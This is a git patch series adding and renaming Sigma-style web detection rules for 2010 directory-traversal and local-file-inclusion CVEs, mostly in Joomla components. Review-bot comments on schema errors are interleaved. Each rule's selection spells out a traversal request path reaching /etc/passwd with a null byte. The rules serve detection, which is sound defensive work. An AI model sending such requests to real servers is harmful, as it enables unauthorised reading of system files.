+id: 92b06e2a-66ae-47b3-a135-fd2759f05902
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in archeryscores.php in the Archery
diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722.yaml
index 0fc9c72a..a7765c23 100644
--- a/rules/web/web_cve_CVE-2010-1722.yaml
+++ b/rules/web/web_cve_CVE-2010-1722.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion
-id: 2de26e96-5594-4743-a74b-d8687d807efa
-Author: Subhash Popuri (@pbssubhash)
+id: b0d9873c-08fc-4389-89aa-751d7d8d682e
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Online Market (com_market) component
diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875.yaml
index d85a45fc..e38a061a 100644
--- a/rules/web/web_cve_CVE-2010-1875.yaml
+++ b/rules/web/web_cve_CVE-2010-1875.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion
-id: b2fa9b8b-da34-4598-b0dd-a77e409f786a
-Author: Subhash Popuri (@pbssubhash)
+id: 454a58b3-a30a-4577-8175-a93d0febcb34
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Real Estate Property (com_properties)
diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953.yaml
index 7317ab8e..b5cb130b 100644
--- a/rules/web/web_cve_CVE-2010-1953.yaml
+++ b/rules/web/web_cve_CVE-2010-1953.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
-id: 0dcfbc60-2e37-4b43-a916-19cb2b8566d1
-Author: Subhash Popuri (@pbssubhash)
+id: e8b2e18e-5a9e-429e-9cd3-a839701736dc
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
diff --git a/rules/web/web_cve_CVE-2010-1954.yaml b/rules/web/web_cve_CVE-2010-1954.yaml
index 4b769808..4b1a6939 100644
--- a/rules/web/web_cve_CVE-2010-1954.yaml
+++ b/rules/web/web_cve_CVE-2010-1954.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1954:Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
-id: b669a952-66dd-4336-9372-1a91f0f7df69
-Author: Subhash Popuri (@pbssubhash)
+id: be925ca8-6808-4c32-951d-6069597c2cab
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955.yaml
index cfbab60f..fb9bb13f 100644
--- a/rules/web/web_cve_CVE-2010-1955.yaml
+++ b/rules/web/web_cve_CVE-2010-1955.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
-id: 25f05d16-2cb0-442b-9902-d3ad8cff11f7
-Author: Subhash Popuri (@pbssubhash)
+id: 9d34dee7-212f-49a0-a1fe-41b37ea241d9
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979.yaml
index 02ca8a2a..a88364c8 100644
--- a/rules/web/web_cve_CVE-2010-1979.yaml
+++ b/rules/web/web_cve_CVE-2010-1979.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
-id: 8d003d22-516d-445b-a8cf-809065ec3d2a
-Author: Subhash Popuri (@pbssubhash)
+id: 4ccbb33d-d6d9-4f18-bc7f-502bd3cc9481
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983.yaml
index e3de690f..7543adad 100644
--- a/rules/web/web_cve_CVE-2010-1983.yaml
+++ b/rules/web/web_cve_CVE-2010-1983.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion
-id: ef76c1fe-3653-4530-b55b-0676b399c927
-Author: Subhash Popuri (@pbssubhash)
+id: fae044ae-fe67-4a83-809f-7a3203ee1a6d
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033.yaml
index 12a5c02e..bcb492f1 100644
--- a/rules/web/web_cve_CVE-2010-2033.yaml
+++ b/rules/web/web_cve_CVE-2010-2033.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion
-id: f953c147-a017-4f36-a20f-64c8bf4ec31a
-Author: Subhash Popuri (@pbssubhash)
+id: 80fca714-f31f-48e7-82cd-07bb3ed0917d
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036.yaml
index 0057029c..58d3c310 100644
--- a/rules/web/web_cve_CVE-2010-2036.yaml
+++ b/rules/web/web_cve_CVE-2010-2036.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
-id: 3036ae41-8549-429e-ba64-a3dd5991f7f2
-Author: Subhash Popuri (@pbssubhash)
+id: b86f1914-f00b-4ba3-8f0b-3db29399d4d7
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259.yaml
index 2dd1e173..55e68a9e 100644
--- a/rules/web/web_cve_CVE-2010-2259.yaml
+++ b/rules/web/web_cve_CVE-2010-2259.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion
-id: 9876750e-ffd6-41a6-9486-31f17db8ab87
-Author: Subhash Popuri (@pbssubhash)
+id: a95a2207-33da-40df-a4ab-f8a53d8e99d9
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307.yaml
index 221de5f3..3b4a10be 100644
--- a/rules/web/web_cve_CVE-2010-2307.yaml
+++ b/rules/web/web_cve_CVE-2010-2307.yaml
@@ -1,7 +1,7 @@
 title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM
 - Directory Traversal
-id: c2979f47-e361-4ce4-9f69-8a6a8bdf8916
-Author: Subhash Popuri (@pbssubhash)
+id: 6251acca-594f-48d0-8ec8-6f156c844e6e
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Multiple directory traversal vulnerabilities in the web server for Motorola
diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682.yaml
index af009d5e..170858c7 100644
--- a/rules/web/web_cve_CVE-2010-2682.yaml
+++ b/rules/web/web_cve_CVE-2010-2682.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
-id: a6e33159-2c73-4bde-b40c-cf013d639d8c
-Author: Subhash Popuri (@pbssubhash)
+id: 1f409782-791f-4d8b-a63b-d0d713463cdb
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861.yaml
index 57ec00fa..40081783 100644
--- a/rules/web/web_cve_CVE-2010-2861.yaml
+++ b/rules/web/web_cve_CVE-2010-2861.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
-id: 422116aa-40e3-4e44-a32f-b6c6f5855200
-Author: Subhash Popuri (@pbssubhash)
+id: 7ceb4e78-34fa-48a5-be21-a50307631d19
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Multiple directory traversal vulnerabilities in the administrator console
diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426.yaml
index e6d0e930..42379e8a 100644
--- a/rules/web/web_cve_CVE-2010-3426.yaml
+++ b/rules/web/web_cve_CVE-2010-3426.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
-id: 542e1a33-d6b0-4843-9a27-ad846c2daf22
-Author: Subhash Popuri (@pbssubhash)
+id: a991b845-3035-492c-914d-0cb7b0e7bd10
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231.yaml
index 436138ed..dbe3d725 100644
--- a/rules/web/web_cve_CVE-2010-4231.yaml
+++ b/rules/web/web_cve_CVE-2010-4231.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal
-id: aa46c601-90ce-48b3-b45e-c56eefd86134
-Author: Subhash Popuri (@pbssubhash)
+id: 8c7f0cbc-c7cd-4bb5-87ef-9e2ff125b7d8
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617.yaml
index f925c853..f31d5418 100644
--- a/rules/web/web_cve_CVE-2010-4617.yaml
+++ b/rules/web/web_cve_CVE-2010-4617.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion
-id: 44d2ed53-964a-420c-a410-c4d44356a0f4
-Author: Subhash Popuri (@pbssubhash)
+id: 35c29803-4068-4a64-a007-d2b6984f8c58
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278.yaml
index e8c0a733..fd292926 100644
--- a/rules/web/web_cve_CVE-2010-5278.yaml
+++ b/rules/web/web_cve_CVE-2010-5278.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-5278:MODx manager - Local File Inclusion
-id: 0ed9f57e-d400-4f95-aaa4-6356b8e7eaeb
-Author: Subhash Popuri (@pbssubhash)
+id: 5e042bf8-67ea-4455-8b75-07c57d7ccdad
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
From 25bcf1695d346ffd29e372b1f932ad3eefb1d3f8 Mon Sep 17 00:00:00 2001
From: pbssubhash Date: Wed, 25 Aug 2021 21:39:20 +0530 Subject: [PATCH 0579/1367] Changed title to reduce the chars --- ...ve_CVE-2010-0943 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-0944 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1306 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1314 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1345 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1353 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1474 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-1475 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1495 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1532 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1533 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1535 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1602 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-1657 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1718 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1722 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1875 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-1953 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1954 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1955 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1979 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1983 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-2033 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2036 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2259 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-2307 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2682 exploitation attempt.yaml | 26 ++++++++++++++++++ 
...ve_CVE-2010-2861 exploitation attempt.yaml | 27 +++++++++++++++++++ ...ve_CVE-2010-3426 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-4231 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-4617 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-5278 exploitation attempt.yaml | 26 ++++++++++++++++++ 32 files changed, 794 insertions(+) create mode 100644 rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml 
create mode 100644 rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml diff --git a/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml new file mode 100644 index 00000000..d6be923a --- /dev/null +++ b/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml 
@@ -0,0 +1,25 @@
+title: CVE-2010-0943 exploitation attempt
+id: 63b70c55-0d7a-4e2f-a130-11028352b6ff
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter in a jashowcase action to index.php.
+references:
+- https://www.exploit-db.com/exploits/11090
+- https://www.cvedetails.com/cve/CVE-2010-0943
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml
new file mode 100644
index 00000000..c38d952b
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml
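Review bot: This new rule, and every new-file hunk that follows it on this page, reintroduces the schema problems the earlier hunks in this series fix: `Author:` should be the lowercase `author:` key, `false_positives:` is not the Sigma field name (`falsepositives:`), `date: 25/08/2021` is day-first where Sigma expects `date: 2021/08/25`, and there is no `logsource:` block at all, so a backend has nothing to map `c-uri` against. A minimal `logsource:` with `  category: webserver` placed before `detection:` is what the other web rules need to convert. The selection also pins one exact `../` depth and the literal `%00` suffix, so an attempt with a different depth or a decoded null byte is missed; `c-uri|contains|all:` with the component name (`option=com_jashowcase`) and `../` as separate items would cover the same requests more robustly. The file names contain spaces (`... exploitation attempt.yaml`), unlike the `web_cve_CVE-2010-2259.yaml` naming used by the files modified on the preceding lines.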
@@ -0,0 +1,25 @@
+title: CVE-2010-0944 exploitation attempt
+id: d30903f7-cb51-445f-81a1-f2948f5fb763
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JCollection (com_jcollection)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/11088
+- https://www.cvedetails.com/cve/CVE-2010-0944
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml
new file mode 100644
index 00000000..70431ad7
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1306 exploitation attempt
+id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
+ 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml
new file mode 100644
index 00000000..7faa239f
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1314 exploitation attempt
+id: 24c87e4f-7206-451a-9164-364ca4f3c388
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
+ component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml
new file mode 100644
index 00000000..25b32926
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1345 exploitation attempt
+id: 5f723f65-f584-49f3-87c0-7babbae20d9d
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
+ component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via
+ a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml
new file mode 100644
index 00000000..1ba62bda
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1353 exploitation attempt
+id: 26d15692-1cfc-4427-8e7d-9a364c2628f3
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
+ component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the view parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12068
+- https://www.cvedetails.com/cve/CVE-2010-1353
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml
new file mode 100644
index 00000000..21b6dc41
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml
@@ -0,0 +1,26 @@
+title: CVE-2010-1474 exploitation attempt
+id: 5b50ffc4-dde4-4905-9da9-eb499ee53971
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
+ component 1.5.x for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/12182
+- https://www.cvedetails.com/cve/CVE-2010-1474
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml
new file mode 100644
index 00000000..4786c685
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1475 exploitation attempt
+id: 69295f5a-428a-47d6-bf4d-a93bb23270ca
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
+ component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml
new file mode 100644
index 00000000..9e3ef52a
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1495 exploitation attempt
+id: e21410ad-5016-457a-a48f-2da871951471
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Matamko (com_matamko) component
+ 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
+ in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12286
+- https://www.cvedetails.com/cve/CVE-2010-1495
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
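Review bot: The CVE-2010-1475 selection string carries a doubled equals sign, `controller==../`, while every sibling rule on this page uses `controller=../`; if the second `=` is a transcription artifact rather than the shape of the published request, requests of the normal `controller=../` form will never match and the rule is effectively dead. Confirm against the referenced template, and if the extra character is not intentional change the item to `- /index.php?option=com_preventive&controller=../`, which also drops the fixed traversal depth that the other rules pin.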
diff --git a/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml
new file mode 100644
index 00000000..bb5f49b8
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1532 exploitation attempt
+id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
+ component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml
new file mode 100644
index 00000000..31ae9336
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1533 exploitation attempt
+id: 2e547af2-0fb1-4d26-829e-fb42d959133c
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
+ 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml
new file mode 100644
index 00000000..d2ee67cd
--- /dev/null
